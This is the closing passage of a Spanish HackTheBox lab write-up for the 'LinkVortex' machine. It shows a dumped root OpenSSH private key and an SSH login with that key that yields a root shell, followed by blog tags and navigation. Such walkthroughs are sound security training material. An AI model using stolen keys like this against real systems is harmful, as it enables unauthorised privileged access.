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
<span class="nv">ICLgLxRR4sAx0AAAAPcm9vdEBsaW5rdm9ydGV4AQIDBA</span><span class="o">==</span>
<span class="nt">-----END</span> OPENSSH PRIVATE KEY-----
bob@linkvortex:~<span class="err">$</span>
</pre></table></code></div></div><p>Procedí a conectarme a través de SSH y obtuve los máximos privilegios en la máquina.</p><div class="language-shell highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>rabb1t@hold:~<span class="nv">$ </span>ssh root@10.10.11.47 <span class="nt">-i</span> id_rsa
Welcome to Ubuntu 22.04.5 LTS <span class="o">(</span>GNU/Linux 6.5.0-27-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that <span class="nb">users </span><span class="k">do </span>not log into.

To restore this content, you can run the <span class="s1">'unminimize'</span> command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Dec  2 11:20:43 2024 from 10.10.14.61
root@linkvortex:~# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root@linkvortex:~#
</pre></table></code></div></div><p>¡Happy Hacking!</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/writeup/'>Writeup</a>, <a href='/categories/machines/'>Machines</a>, <a href='/categories/linux/'>Linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/arbitrary-file-read/" class="post-tag no-text-decoration" >Arbitrary-File-Read</a> <a href="/tags/cve-2023-40028/" class="post-tag no-text-decoration" >CVE-2023-40028</a> <a href="/tags/git/" class="post-tag no-text-decoration" >.git</a> <a href="/tags/symbolic-link/" class="post-tag no-text-decoration" >symbolic-link</a> <a href="/tags/ghost-blog/" class="post-tag no-text-decoration" >Ghost-Blog</a> <a href="/tags/subdomains-enumeration/" class="post-tag no-text-decoration" >subdomains-enumeration</a> <a href="/tags/code-analyse/" class="post-tag no-text-decoration" >Code-analyse</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> Esta entrada está licenciada bajo <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> por el autor.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Compartir</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Writeup+LinkVortex+HTB+-+rabb1t&url=https%3A%2F%2Frabb1t-0.github.io%2Fposts%2FWriteUp-LinkVortex-HTB%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Writeup+LinkVortex+HTB+-+rabb1t&u=https%3A%2F%2Frabb1t-0.github.io%2Fposts%2FWriteUp-LinkVortex-HTB%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Frabb1t-0.github.io%2Fposts%2FWriteUp-LinkVortex-HTB%2F&text=Writeup+LinkVortex+HTB+-+rabb1t" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copiar enlace" data-title-succeed="¡Enlace copiado!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Actualizado recientemente</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/WriteUp-LinkVortex-HTB/">Writeup LinkVortex HTB</a><li><a href="/posts/WriteUp-Undetected-HTB/">WriteUp Undetected HTB</a><li><a href="/posts/WriteUp-Late-HTB/">WriteUp Late HTB</a><li><a href="/posts/WriteUp-TimeLapse-HTB/">WriteUp TimeLapse HTB</a><li><a href="/posts/WriteUp-Noter-HTB/">WriteUp Noter HTB</a></ul></div><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/code-analyse/">Code-analyse</a> <a class="post-tag" href="/tags/ssti/">SSTI</a> <a class="post-tag" href="/tags/git/">.git</a> <a class="post-tag" href="/tags/anonimato/">Anonimato</a> <a class="post-tag" href="/tags/arbitrary-file-read/">Arbitrary-File-Read</a> <a class="post-tag" href="/tags/attacks-backdoor/">Attacks/Backdoor</a> <a class="post-tag" href="/tags/burpsuite/">BurpSuite</a> <a class="post-tag" href="/tags/chattr/">chattr</a> <a class="post-tag" href="/tags/command-injection/">command-injection</a> <a class="post-tag" href="/tags/crackmapexec/">crackmapexec</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contenido</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Lecturas adicionales</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/WriteUp-RedPanda-HTB/"><div class="card-body"> <em class="timeago small" data-ts="1669438800" > 2022-11-26 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>WriteUp RedPanda HTB</h3><div class="text-muted small"><p> Índice Información básica de la máquina Herramientas y recursos empleados Enumeración Buscando pandas rojos Explotando la vulnerabilidad SSTI mientras buscamos pandas rojos Ob...</p></div></div></a></div><div class="card"> <a href="/posts/WriteUp-Photobomb-HTB/"><div class="card-body"> <em class="timeago small" data-ts="1676091600" > 2023-02-11 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Writeup Photobomb HTB</h3><div class="text-muted small"><p> La máquina photobomb cuenta con un servicio web en el cual hay un panel de autenticación básico, en él podremos registrarnos gracias a unas credenciales que están en la propia web. Después de haber...</p></div></div></a></div><div class="card"> <a href="/posts/WriteUp-Undetected-HTB/"><div class="card-body"> <em class="timeago small" data-ts="1656910800" > 2022-07-04 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>WriteUp Undetected HTB</h3><div class="text-muted small"><p> Índice Información básica de la máquina Herramientas-y-recursos-empleados Fase de enumeración Explotando fallo de PHP Unit (CVE-2017-9841) Privesc steven Privesc root Máquina Undetec...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/WriteUp-Photobomb-HTB/" class="btn btn-outline-primary" prompt="Anterior"><p>Writeup Photobomb HTB</p></a><div class="btn btn-outline-primary disabled" prompt="Nuevo"><p>-</p></div></div><script type="text/javascript"> $(function () { const origin = "https://giscus.app"; const iframe = "iframe.giscus-frame"; const lightTheme = "light"; const darkTheme = "dark_dimmed"; let initTheme = lightTheme; if ($("html[data-mode=dark]").length > 0 || ($("html[data-mode]").length == 0 && window.matchMedia("(prefers-color-scheme: dark)").matches)) { initTheme = darkTheme; } let giscusAttributes = { "src": "https://giscus.app/client.js", "data-repo": "rabb1t-0/rabb1t-0.github.io", "data-repo-id": "R_kgDOHL8JPA", "data-category": "general", "data-category-id": "DIC_kwDOHL8JPM4CPeS9", "data-mapping": "pathname", "data-reactions-enabled": "1", "data-emit-metadata": "0", "data-theme": initTheme, "data-input-position": "top", "data-lang": "en", "crossorigin": "anonymous", "async": "" }; let giscusScript = document.createElement("script"); Object.entries(giscusAttributes).forEach(([key, value]) => giscusScript.setAttribute(key, value)); document.getElementById("tail-wrapper").appendChild(giscusScript); addEventListener("message", (event) => { if (event.source === window && event.data && event.data.direction === ModeToggle.ID) { /* global theme mode changed */ const mode = event.data.message; const theme = (mode === ModeToggle.DARK_MODE ? darkTheme : lightTheme); const message = { setConfig: { theme: theme } }; const giscus = document.querySelector(iframe).contentWindow; giscus.postMessage({ giscus: message }, origin); } }); }); </script></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/rabb1t-0">rabb1t</a>. <span data-toggle="tooltip" data-placement="top" title="Salvo que se indique explícitamente, las entradas de este blog están licenciadas bajo la Creative Commons Attribution 4.0 International (CC BY 4.0) License por el autor.">Algunos derechos reservados.</span></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Etiquetas populares</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/code-analyse/">Code-analyse</a> <a class="post-tag" href="/tags/ssti/">SSTI</a> <a class="post-tag" href="/tags/git/">.git</a> <a class="post-tag" href="/tags/anonimato/">Anonimato</a> <a class="post-tag" href="/tags/arbitrary-file-read/">Arbitrary-File-Read</a> <a class="post-tag" href="/tags/attacks-backdoor/">Attacks/Backdoor</a> <a class="post-tag" href="/tags/burpsuite/">BurpSuite</a> <a class="post-tag" href="/tags/chattr/">chattr</a> <a class="post-tag" href="/tags/command-injection/">command-injection</a> <a class="post-tag" href="/tags/crackmapexec/">crackmapexec</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">¡Oops! No se encuentran resultados.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/es.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
